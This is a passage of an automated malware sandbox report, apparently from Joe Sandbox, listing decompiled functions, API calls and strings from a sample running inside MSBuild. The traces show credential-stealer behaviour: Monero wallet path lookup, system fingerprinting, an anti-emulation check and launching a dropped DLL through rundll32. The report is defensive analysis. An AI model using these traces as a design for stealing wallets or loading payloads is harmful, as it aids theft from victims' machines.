Opcode Fuzzy Hash: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
Instruction Fuzzy Hash: 4A5191B1D0022C9FDB309F54DC85BDDB7B8AB44308F0001FAA609B7692D6796E898F59

Function 0041566F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
RegCloseKey.ADVAPI32(?), ref: 004156F6
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Strings

.{A, xrefs: 004157FE

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue_memset
String ID: .{A
API String ID: 3891774339-8545219
Opcode ID: f6d98237a04e32636f27a897e0831807c899ef243b91f7b553c1fbd532b5787d
Instruction ID: b4758eb7aeb23ac53986d5a941949a19eceae9c1109b67c9f6111efe06dcff68
Opcode Fuzzy Hash: f6d98237a04e32636f27a897e0831807c899ef243b91f7b553c1fbd532b5787d
Instruction Fuzzy Hash: 0C41C07194011D9FDF24EF60EC86EE9777ABB18309F4004AAB509A31A0EE759FC58F94

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 004115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
CharToOemA.USER32(?,?), ref: 0041166B

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C
MachineGuid, xrefs: 00411640

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
Instruction ID: c9c539ce5467448423737f6d9a950d2a9d5193a79ae08df00dacda0898e1b174
Opcode Fuzzy Hash: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
Instruction Fuzzy Hash: 7B111EB590021DAFDB10DF90DC89FEAB7BDEB04309F5041E6A659E2052E6759F888F14

Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD

Strings

wallet_path, xrefs: 00401A9C
SOFTWARE\monero-project\monero-core, xrefs: 00401A7F

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: da1045694f7c1a98f785db87d1439f5f65af28086f388a3e5cebff55084345b5
Instruction ID: 3e4ac90b5bcc3d6fe188be62ffa2ac0dd84bb3fe34a2510e6e6e226720dcc0e4
Opcode Fuzzy Hash: da1045694f7c1a98f785db87d1439f5f65af28086f388a3e5cebff55084345b5
Instruction Fuzzy Hash: 15F05475780304BFFF14DB90DC0EFAE7A7DDB44B06F141065B601A51D0E7B66A50D664

Function 00410B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
Instruction ID: 0994ca530c552eb12484d48fed68a7c00db0df5c681817d2f603923d478d8980
Opcode Fuzzy Hash: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
Instruction Fuzzy Hash: B1114C75A0420ADFCB019FA4CC989EEBBB5AF49310F64417EF215E73A0CB394945CB68

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004185DC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
Instruction ID: 46aed83c215a1155ddf1663667cd5ec87320cd9fa35168939231c0eb8388c106
Opcode Fuzzy Hash: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
Instruction Fuzzy Hash: 57F0C27278122077F22422763C6EFAB5A6C9B42F56F205035F309FB2D0D66998049ABC

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

.dll, xrefs: 004129ED
C:\ProgramData\, xrefs: 00412995
"" , xrefs: 00412A32
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: 3c3eaabb6bf30a628491cb7f6c6410e5825dbbecd231003ae5c9a6d33902ade5
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: 3c3eaabb6bf30a628491cb7f6c6410e5825dbbecd231003ae5c9a6d33902ade5
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
Instruction ID: cfd5adc8c7fec37571e4615a2d659ce623d81488d817e1095ce6785adf6647ed
Opcode Fuzzy Hash: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
Instruction Fuzzy Hash: 1A11B971A0011CABCB10EB65DC45FCD7378AB14704F0000A6B645E7191DAB89FC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
Instruction ID: d79e8d54b07d2f615201cd360c868d95b9dac01f4be2040cf9acff1c057e51b0
Opcode Fuzzy Hash: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
Instruction Fuzzy Hash: F201A9B1E00218BBEB08DFB4DC45EEFB7B9EF08705F04006AF602D7290EA7599818758

Function 0041BD34 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C), ref: 0041BD81
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000), ref: 0041BDB9

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

